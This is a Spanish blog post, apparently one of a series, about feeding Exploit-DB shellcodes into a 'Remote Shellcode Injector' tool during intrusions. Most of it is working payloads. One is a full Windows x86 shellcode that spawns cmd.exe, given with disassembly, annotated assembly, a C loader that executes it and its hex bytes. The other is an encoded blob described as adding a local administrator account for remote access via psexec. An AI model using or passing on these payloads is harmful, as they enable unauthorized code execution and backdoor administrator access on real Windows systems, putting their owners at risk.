Buenas a todos, durante estas semanas hemos estado viendo el funcionamiento de Remote Shellcode Injector, una simple pero útil herramienta para vuestros procesos de intrusión.
Recordad que simplemente debemos modificar en la variable "sc" el contenido de la shellcode, ¡nada más!
Saludos!
Hoy quería jugar con vosotros con algunas shellcodes publicadas en Exploit-DB cómo la siguiente, con la que ejecutaremos una consola de comandos:
/* # Title : Windows x86 CreateProcessA(NULL,"cmd.exe",NULL,NULL,0,NULL,NULL,NULL,&STARTUPINFO,&PROCESS_INFORMATION) shellcode # Author : Roziul Hasan Khan Shifat # Date : 15-08-2016 # Tested On : Windows 7 x86*//*Disassembly of section .text:00000000 <_start>: 0: 31 c9 xor %ecx,%ecx 2: 64 8b 41 30 mov %fs:0x30(%ecx),%eax 6: 8b 40 0c mov 0xc(%eax),%eax 9: 8b 70 14 mov 0x14(%eax),%esi c: ad lods %ds:(%esi),%eax d: 96 xchg %eax,%esi e: ad lods %ds:(%esi),%eax f: 8b 48 10 mov 0x10(%eax),%ecx 12: 31 db xor %ebx,%ebx 14: 8b 59 3c mov 0x3c(%ecx),%ebx 17: 01 cb add %ecx,%ebx 19: 8b 5b 78 mov 0x78(%ebx),%ebx 1c: 01 cb add %ecx,%ebx 1e: 8b 73 20 mov 0x20(%ebx),%esi 21: 01 ce add %ecx,%esi 23: 31 d2 xor %edx,%edx00000025 <func>: 25: 42 inc %edx 26: ad lods %ds:(%esi),%eax 27: 01 c8 add %ecx,%eax 29: 81 38 47 65 74 50 cmpl $0x50746547,(%eax) 2f: 75 f4 jne 25 <func> 31: 81 78 04 72 6f 63 41 cmpl $0x41636f72,0x4(%eax) 38: 75 eb jne 25 <func> 3a: 81 78 08 64 64 72 65 cmpl $0x65726464,0x8(%eax) 41: 75 e2 jne 25 <func> 43: 8b 73 1c mov 0x1c(%ebx),%esi 46: 01 ce add %ecx,%esi 48: 8b 14 96 mov (%esi,%edx,4),%edx 4b: 01 ca add %ecx,%edx 4d: 89 d6 mov %edx,%esi 4f: 89 cf mov %ecx,%edi 51: 31 db xor %ebx,%ebx 53: 68 79 41 41 41 push $0x41414179 58: 66 89 5c 24 01 mov %bx,0x1(%esp) 5d: 68 65 6d 6f 72 push $0x726f6d65 62: 68 65 72 6f 4d push $0x4d6f7265 67: 68 52 74 6c 5a push $0x5a6c7452 6c: 54 push %esp 6d: 51 push %ecx 6e: ff d2 call *%edx 70: 83 c4 10 add $0x10,%esp 73: 31 c9 xor %ecx,%ecx 75: 89 ca mov %ecx,%edx 77: b2 54 mov $0x54,%dl 79: 51 push %ecx 7a: 83 ec 54 sub $0x54,%esp 7d: 8d 0c 24 lea (%esp),%ecx 80: 51 push %ecx 81: 52 push %edx 82: 51 push %ecx 83: ff d0 call *%eax 85: 59 pop %ecx 86: 31 d2 xor %edx,%edx 88: 68 73 41 42 42 push $0x42424173 8d: 66 89 54 24 02 mov %dx,0x2(%esp) 92: 68 6f 63 65 73 push $0x7365636f 97: 68 74 65 50 72 push $0x72506574 9c: 68 43 72 65 61 push $0x61657243 a1: 8d 14 24 lea (%esp),%edx a4: 51 push %ecx a5: 52 push %edx a6: 57 push %edi a7: ff d6 call *%esi a9: 59 pop %ecx aa: 83 c4 10 add $0x10,%esp ad: 31 db xor %ebx,%ebx af: 68 65 78 65 41 push $0x41657865 b4: 88 5c 24 03 mov %bl,0x3(%esp) b8: 68 63 6d 64 2e push $0x2e646d63 bd: 8d 1c 24 lea (%esp),%ebx c0: 31 d2 xor %edx,%edx c2: b2 44 mov $0x44,%dl c4: 89 11 mov %edx,(%ecx) c6: 8d 51 44 lea 0x44(%ecx),%edx c9: 56 push %esi ca: 31 f6 xor %esi,%esi cc: 52 push %edx cd: 51 push %ecx ce: 56 push %esi cf: 56 push %esi d0: 56 push %esi d1: 56 push %esi d2: 56 push %esi d3: 56 push %esi d4: 53 push %ebx d5: 56 push %esi d6: ff d0 call *%eax d8: 5e pop %esi d9: 83 c4 08 add $0x8,%esp dc: 31 db xor %ebx,%ebx de: 68 65 73 73 41 push $0x41737365 e3: 88 5c 24 03 mov %bl,0x3(%esp) e7: 68 50 72 6f 63 push $0x636f7250 ec: 68 45 78 69 74 push $0x74697845 f1: 8d 1c 24 lea (%esp),%ebx f4: 53 push %ebx f5: 57 push %edi f6: ff d6 call *%esi f8: 31 c9 xor %ecx,%ecx fa: 51 push %ecx fb: ff d0 call *%eax*//*section .text global _start_start:xor ecx,ecxmov eax,[fs:ecx+0x30] ;PEBmov eax,[eax+0xc] ;PEB->ldrmov esi,[eax+0x14] ;PEB->ldr.InMemOrderModuleListlodsdxchg esi,eaxlodsdmov ecx,[eax+0x10] ;kernel32 base addressxor ebx,ebxmov ebx,[ecx+0x3c] ;DOS->elf_anewadd ebx,ecx ;PE HEADERmov ebx,[ebx+0x78] ;DataDirectory->VirtualAddressadd ebx,ecx ;IMAGE_EXPORT_DIRECTORYmov esi,[ebx+0x20] ;AddressOfNamesadd esi,ecx;---------------------------------------------xor edx,edxfunc:inc edxlodsdadd eax,ecxcmp dword [eax],'GetP'jnz funccmp dword [eax+4],'rocA'jnz funccmp dword [eax+8],'ddre'jnz func;--------------------------------mov esi,[ebx+0x1c] ;AddressOfFunctionsadd esi,ecxmov edx,[esi+edx*4]add edx,ecx ;GetProcAddress();-------------------------------------mov esi,edxmov edi,ecx;-------------------------xor ebx,ebx;finding address of RtlZeroMemory()push 0x41414179mov [esp+1],word bxpush 0x726f6d65push 0x4d6f7265push 0x5a6c7452push esppush ecxcall edx;------------------------------add esp,16;-----------------------------------;zero out 84 bytesxor ecx,ecxmov edx,ecxmov dl,84push ecxsub esp,84lea ecx,[esp]push ecxpush edxpush ecxcall eax;----------------------------;finding address of CreateProcessA()pop ecxxor edx,edxpush 0x42424173mov [esp+2],word dxpush 0x7365636fpush 0x72506574push 0x61657243lea edx,[esp]push ecxpush edxpush edicall esi;--------------------------------;CreateProcessA(NULL,"cmd.exe",NULL,NULL,0,NULL,NULL,NULL,&STARTUPINFO,&PROCESS_INFORMATION)pop ecxadd esp,16xor ebx,ebxpush 0x41657865mov [esp+3],byte blpush 0x2e646d63lea ebx,[esp]xor edx,edxmov dl,68mov [ecx],edxlea edx,[ecx+68]push esi ;xor esi,esipush edxpush ecxpush esipush esipush esipush esipush esipush esipush ebxpush esicall eaxpop esi;-------------------------------------;finding address of ExitProcess()add esp,8xor ebx,ebxpush 0x41737365mov [esp+3],byte blpush 0x636f7250push 0x74697845lea ebx,[esp]push ebxpush edicall esixor ecx,ecxpush ecxcall eax*/#include<stdio.h>#include<string.h>char shellcode[]=\"\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x48\x10\x31\xdb\x8b\x59\x3c\x01\xcb\x8b\x5b\x78\x01\xcb\x8b\x73\x20\x01\xce\x31\xd2\x42\xad\x01\xc8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x73\x1c\x01\xce\x8b\x14\x96\x01\xca\x89\xd6\x89\xcf\x31\xdb\x68\x79\x41\x41\x41\x66\x89\x5c\x24\x01\x68\x65\x6d\x6f\x72\x68\x65\x72\x6f\x4d\x68\x52\x74\x6c\x5a\x54\x51\xff\xd2\x83\xc4\x10\x31\xc9\x89\xca\xb2\x54\x51\x83\xec\x54\x8d\x0c\x24\x51\x52\x51\xff\xd0\x59\x31\xd2\x68\x73\x41\x42\x42\x66\x89\x54\x24\x02\x68\x6f\x63\x65\x73\x68\x74\x65\x50\x72\x68\x43\x72\x65\x61\x8d\x14\x24\x51\x52\x57\xff\xd6\x59\x83\xc4\x10\x31\xdb\x68\x65\x78\x65\x41\x88\x5c\x24\x03\x68\x63\x6d\x64\x2e\x8d\x1c\x24\x31\xd2\xb2\x44\x89\x11\x8d\x51\x44\x56\x31\xf6\x52\x51\x56\x56\x56\x56\x56\x56\x53\x56\xff\xd0\x5e\x83\xc4\x08\x31\xdb\x68\x65\x73\x73\x41\x88\x5c\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x8d\x1c\x24\x53\x57\xff\xd6\x31\xc9\x51\xff\xd0";main(){printf("shellcode lenght %ld\n",(long)strlen(shellcode));(* (int(*)()) shellcode) ();}
Aquí vemos un ejemplo de su ejecución:
Muy útil también es crearnos un usuario administrador local, con el que podamos acceder remotamente a través de psexec por ejemplo, cómo en este otro ejemplo que tenemos a continuación:
"\xda\xde\xd9\x74\x24\xf4\xb8\x22\xd2\x27\x7a\x29\xc9\xb1\x4b""\x5b\x31\x43\x1a\x83\xeb\xfc\x03\x43\x16\xe2\xd7\x3b\xbc\x7a""\x17\xbc\x95\x4b\xd7\xd8\x92\xec\xe7\xa5\x65\x94\x08\x2d\x25""\x69\x9d\x41\xba\xdc\x2a\xe1\xca\xf7\x25\xe2\xca\x07\xbe\xa2""\xfe\x8a\x80\x5e\x74\xd4\x3c\xc1\x49\xb5\xb7\x91\x69\x12\x4c""\x2c\x4e\xd1\x06\xaa\xd6\xe4\x4c\x3f\x6c\xff\x1b\x1a\x51\xfe""\xf0\x78\xa5\x49\x8d\x4b\x4d\x48\x7f\x82\xae\x7a\xbf\x19\xfc""\xf9\xff\x96\xfa\xc0\x30\x5b\x04\x04\x25\x90\x3d\xf6\x9d\x71""\x37\xe7\x56\xdb\x93\xe6\x83\xba\x50\xe4\x18\xc8\x3d\xe9\x9f""\x25\x4a\x15\x14\xb8\xa5\x9f\x6e\x9f\x29\xc1\xad\x72\x01\x53""\xd9\x27\x5d\xac\xe6\xb1\xa5\xd2\xdc\xca\xa9\xd4\xdc\x4b\x6e""\xd0\xdc\x4b\x71\xe0\x12\x3e\x97\xd1\x42\xd8\x57\xd6\x92\x43""\xa9\x5c\x9c\x0d\x8e\x83\xd3\x70\xc2\x4c\x13\x73\x1b\xc4\xf6""\x9b\x43\x29\x07\xa4\xfd\x17\x1c\xb9\xa0\x1a\x9f\x3a\xd4\xd4""\xde\x82\xee\x16\xe0\x04\x07\xa0\x1f\xfb\x28\x26\xd1\x5f\xe6""\x79\xbd\x0c\xf7\x2f\x39\x82\xc7\x80\xbe\xb1\xcf\xc8\xad\xc5""\x2f\xf7\x4e\x57\xb4\x26\xf5\xdf\x51\x17\xda\x7c\xba\x39\x41""\xf7\x9a\xb0\xfa\x92\xa8\x1a\x8f\x39\x2e\x2e\x06\xa6\x80\xf0""\xb5\x16\x8f\x9b\x65\x78\x2e\x38\x01\xa6\x96\xe6\xe9\xc8\xb3""\x92\xc9\x78\x53\x38\x68\xed\xcc\xcc\x05\x98\x62\x11\xb8\x06""\xee\x38\x54\xae\x83\xce\xda\x51\x10\x40\x68\xe1\xf8\xed\xe9""\x66\x8c\x78\x95\x58\x4e\x54\x34\xfd\xea\xaa";Recordad que simplemente debemos modificar en la variable "sc" el contenido de la shellcode, ¡nada más!
Saludos!